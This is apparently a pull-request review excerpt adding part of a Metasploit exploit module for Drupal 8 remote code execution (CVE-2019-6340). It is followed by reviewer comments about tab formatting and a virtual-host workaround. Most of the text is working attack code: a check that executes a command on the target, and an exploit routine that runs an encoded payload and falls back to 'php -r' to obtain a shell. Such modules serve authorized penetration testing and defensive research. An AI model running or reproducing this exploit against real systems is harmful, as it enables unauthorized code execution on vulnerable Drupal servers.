modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb

```diff
@@ -0,0 +1,178 @@
+      ],
+      'References'     => [
+        ['CVE', '2019-6340'],
+        ['URL', 'https://www.drupal.org/sa-core-2019-003'],
+        ['URL', 'https://www.ambionics.io/blog/drupal8-rce']
+      ],
+      'DisclosureDate' => '2019-02-20',
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['php', 'unix', 'linux'],
+      'Arch'           => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Privileged'     => false,
+      'Payload'        => {'BadChars' => '&>\''},
+      'Targets'        => [ ['Automatic', {}] ],
+      'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
+      'DefaultOptions' => {'WfsDelay' => 2},
+      'Notes'          => {'AKA' => ['SA-CORE-2019-003', 'CVE-2019-6340']}
+    ))
+
+    register_options([
+      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])
+    ])
+  end
+
+  def check
+    checkcode = CheckCode::Safe
+
+    @version = target['Version'] || drupal_version
+
+    if @version && @version.to_s =~ /^8\b/
+      print_status("Drupal #{@version} targeted at #{full_uri}")
+      checkcode = CheckCode::Detected
+    else
+      print_error('Could not determine Drupal version to target')
+      return CheckCode::Unknown
+    end
+
+    token = random_crap
+    res   = execute_command("printf #{token}")
+
+    if res && res.body.end_with?(token)
+      checkcode = CheckCode::Vulnerable
+    end
+
+    checkcode
+  end
+
+  def exploit
+    if check == CheckCode::Safe && datastore['ForceExploit'] == false
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    unless @version
+      print_warning('Targeting Drupal 8.x')
+      @version = Gem::Version.new('8')
+    end
+
+    if datastore['PAYLOAD'] == 'cmd/unix/generic'
+      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
+      # XXX: Naughty datastore modification
+      datastore['DUMP_OUTPUT'] = true
+    end
+
+    # Try to get shell
+    execute_command(payload.encoded)
+     
+     sleep(wfs_delay)
+     return if session_created?
+
+    # XXX: This will spawn a *very* obvious process
+    execute_command("php -r '#{payload.encoded}'")
+  end
+
+  def execute_command(cmd)
+    print_status("Executing #{cmd}")
+    res = exploit_drupal8(cmd)
+
+    if res && res.code == 422
+		print_error "Exploit failed, in case that VHOST was not defined, consider to set that option"  	
+    end
+
+    if res && res.code != 403
+      print_error("Unexpected reply: #{res.inspect}")
+      return
+    end
+
+    if res && datastore['DUMP_OUTPUT']
+      print_line(res.body)
+    end
+
+    res
+  end
+
+  # Custom implementation of full_uri to take the vhost if exists, since the exploit may not work when using IP
+  # @see full_uri
+  def vhost_full_uri
```

Comment:
More tabs below

Reply:
Consider implementing/consolidating this in `HttpClient`.

Reply:
@wvu-r7 You mean to contribute it there? I spent ~2 hours on that $#@. I didn't understand why my payload isn't working, until I realized that `RHOSTS` is always converted to IP.

Reply:
https://github.com/rapid7/metasploit-framework/pull/7905#discussion_r100090929

It's my fault, hah. Let me do something about that.